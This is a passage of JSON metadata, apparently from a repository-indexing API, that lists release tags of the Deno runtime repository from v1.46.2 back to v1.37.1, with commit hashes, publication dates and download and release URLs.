s://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/